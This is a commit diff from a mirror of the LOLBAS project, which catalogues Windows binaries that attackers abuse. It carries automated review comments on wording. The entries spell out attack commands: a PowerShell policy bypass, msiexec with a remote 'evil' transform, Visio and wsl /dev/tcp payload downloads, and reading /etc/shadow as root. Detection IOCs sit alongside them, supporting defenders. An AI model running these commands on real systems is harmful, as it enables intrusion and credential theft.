mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-27 22:10:20 +01:00
Merge branch 'LOLBAS-Project:master' into XBootMgrSleep
commit 4fc93f5e5b
yml/HonorableMentions/PowerShell.yml (Normal file, 38 lines)
@ -0,0 +1,38 @@
---
Name: Powershell.exe
Description: Powershell.exe is a a task-based command-line shell built on .NET.
Author: 'Everyone'
Created: 2024-04-03
Commands:
- Command: powershell.exe -ep bypass -file c:\path\to\a\script.ps1
Description: Set the execution policy to bypass and execute a PowerShell script without warning
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
Category: Execute
Privileges: User
MitreID: T1059.001
OperatingSystem: Windows 7 and up
- Command: powershell.exe -ep bypass -command "Invoke-AllTheThings..."
Description: Set the execution policy to bypass and execute a PowerShell command
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
Category: Execute
Privileges: User
MitreID: T1059.001
OperatingSystem: Windows 7 and up
- Command: powershell.exe -ep bypass -ec IgBXAGUAIAA8ADMAIABMAE8ATABCAEEAUwAiAA==
Description: Set the execution policy to bypass and execute a very malicious PowerShell encoded command
Usecase: Execute PowerShell cmdlets, .NET code, and just about anything else your heart desires
Category: Execute
Privileges: User
MitreID: T1059.001
OperatingSystem: Windows 7 and up
Full_Path:
- Path: '%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe'
- Path: '%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/tree/71ae004b32bb3c7fb04714f8a051fc8e5edda68c/rules/windows/powershell
Resources:
- Link: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1
- Link: https://attack.mitre.org/techniques/T1059/001/
Acknowledgement:
- Person: Everyone
Handle: '@alltheoffensivecyberers'
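Review bot: the Description line of the new PowerShell.yml has a doubled article, `Description: Powershell.exe is a a task-based command-line shell built on .NET.`; drop one `a`. The three commands also use `OperatingSystem: Windows 7 and up`, while the other entries touched by this commit enumerate versions (`Windows 10, Windows Server 2019, Windows 11`); following the same convention would keep the field consistent across the repository.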
@ -1,18 +1,18 @@
---
Name: Csc.exe
Description: Binary file used by .NET to compile C# code
Description: Binary file used by .NET Framework to compile C# code
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
- Command: csc.exe -out:Output.exe File.cs
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: csc -target:library File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
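Review bot: the unchanged `Usecase: Compile attacker code on system. Bypass defensive counter measures.` lines (both commands) should read `countermeasures` as one word, and the context line `OperatingSystem: Windows vista, Windows 7, ...` keeps lowercase `vista` while this same commit capitalises it to `Windows Vista` in the msiexec entry; both are worth fixing here since the file is already being edited.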
@ -30,7 +30,4 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- IOC: Csc.exe should normally not run as System account unless it is used for development.
Resources:
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Acknowledgement:
- Person:
Handle:
- Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/
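Review bot: the Elastic rule kept at the top of this hunk is named `defense_evasion_execution_msbuild_started_unusal_process.toml`, which by its filename targets MSBuild rather than csc.exe; confirm it actually fires on csc.exe activity or reference a csc-specific rule. Dropping the empty `Acknowledgement:` block (`- Person:` / `Handle:` with no values) is fine. The replacement link `https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/` points at the compiler options index rather than the old `command-line-building-with-csc-exe` page; check that it still documents the `-out:` and `-target:library` options used by the commands above.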
@ -19,7 +19,7 @@ Commands:
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to register the target DLL.
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
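Review bot: with `DllRegisterServer` now matching the export's real casing, the unchanged `Usecase: Execute dll files` line in the same block still uses lowercase `dll` while the Description and the `- Execute: DLL` tag use `DLL`; suggest `Usecase: Execute DLL files`.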
@ -28,7 +28,7 @@ Commands:
Tags:
- Execute: DLL
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLUnregisterServer to un-register the target DLL.
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
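Review bot: the same `dll` versus `DLL` casing point as in the `/y` entry applies to `Usecase: Execute dll files` here, and in the corrected Description `un-register` would read better as `unregister`, matching the export name `DllUnregisterServer` it refers to.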
@ -37,12 +37,12 @@ Commands:
Tags:
- Execute: DLL
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe
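Review bot: the new Description line still carries the grammar problems of the old one: `the file can be signed by vendor` (by the vendor), `Additional to the file a transformation file will be used` (in addition, a transform file is applied) and `which can contains` (can contain). Suggested wording: `Description: Installs the target .MSI file from a remote URL; the file can be signed by the vendor. In addition, a transform (.mst) file is applied, which can contain malicious code or binaries. The /qb switch suppresses user input.` The `Windows vista` to `Windows Vista` correction in this hunk is right.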
@ -8,7 +8,7 @@ Commands:
Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"'
Usecase: Download and execute an arbitrary file from the internet
Category: Execute
Privileges: Local Aministrator - required to enabled local manifest setting
Privileges: Local Administrator - required to enable local manifest setting
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
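Review bot: the corrected Privileges line fixes both typos; as a minor wording point, `required to enable the local manifest setting` reads better. Since the Description already spells out the prerequisite (`winget settings --enable LocalManifestFiles`), the Privileges field could be reduced to `Local Administrator` with the reason left in the Description so the prerequisite is stated once.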
yml/OtherMSBinaries/Visio.yml (Normal file, 34 lines)
@ -0,0 +1,34 @@
---
Name: Visio.exe
Description: Microsoft Visio Executable
Author: Avihay Eldad
Created: 2024-02-15
Commands:
- Command: Visio.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
Detection:
- IOC: URL on a visio.exe command line
- IOC: visio.exe making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
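Review bot: `OperatingSystem: Windows` in the new Visio.yml is far coarser than the other entries in this commit, which list specific versions, and the file has no `Resources:` section; since the Full_Path list spans Office14 through Office16, stating which Office and Windows versions the behaviour was verified on would help readers and defenders writing path-based rules. The two IOCs are useful; the Description (`Downloads payload from remote server`) could also mention that the file lands in INetCache, which is currently only in the Usecase.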
@ -10,35 +10,28 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat file'
Description: Cats /etc/shadow file as root
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --system calc.exe
Description: Execute the command as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
MitreID: T1105
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
- Path: C:\Windows\System32\wsl.exe
Code_Sample:
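Review bot: replacing the `--exec bash -c 'cat file'` command, whose Description wrongly repeated `Cats /etc/shadow file as root`, with the generic `--exec bash -c "<command>"` entry and a Description that explains `-u <username>` and `-d <distro name>` is the right fix, as is moving the `/dev/tcp` download from `MitreID: T1202` to `MitreID: T1105`. One `OperatingSystem: Windows 10, Windows 19 Server` line (after the `MitreID: T1202` of the `<command>` entry) still shows in the rendered diff without a replacement beside it; confirm every occurrence ends up as `Windows 10, Windows Server 2019, Windows 11` in the resulting file.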
@ -59,3 +52,4 @@ Acknowledgement:
Handle: '@d1r4c'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'
- Person: Konrad 'unrooted' Klawikowski
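Review bot: the added `- Person: Konrad 'unrooted' Klawikowski` has no `Handle:` line, unlike the two preceding entries (`'@d1r4c'`, `'@nas_bench'`); add one if a handle is available so the Acknowledgement entries keep the same shape.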
yml/OtherMSBinaries/winfile.yml (Normal file, 24 lines)
@ -0,0 +1,24 @@
---
Name: winfile.exe
Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: winfile.exe calc.exe
Description: Execute an executable file with WinFile as a parent process.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\winfile.exe
- Path: C:\Windows\winfile.exe
- Path: C:\Program Files\WinFile\winfile.exe
- Path: C:\Program Files (x86)\WinFile\winfile.exe
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
Resources:
- Link: https://github.com/microsoft/winfile
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
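Review bot: the Store path `C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe` pins the package version `10.3.0.0`, which changes with every update; the other entries in this commit avoid versioned paths, so a note that the version segment varies would help anyone building path-based rules. The new file also has no `Detection:` section, while the Visio.yml added in the same commit does; an IOC such as winfile.exe appearing as the parent of an unexpected child process (the point the Description itself makes) would be a natural addition.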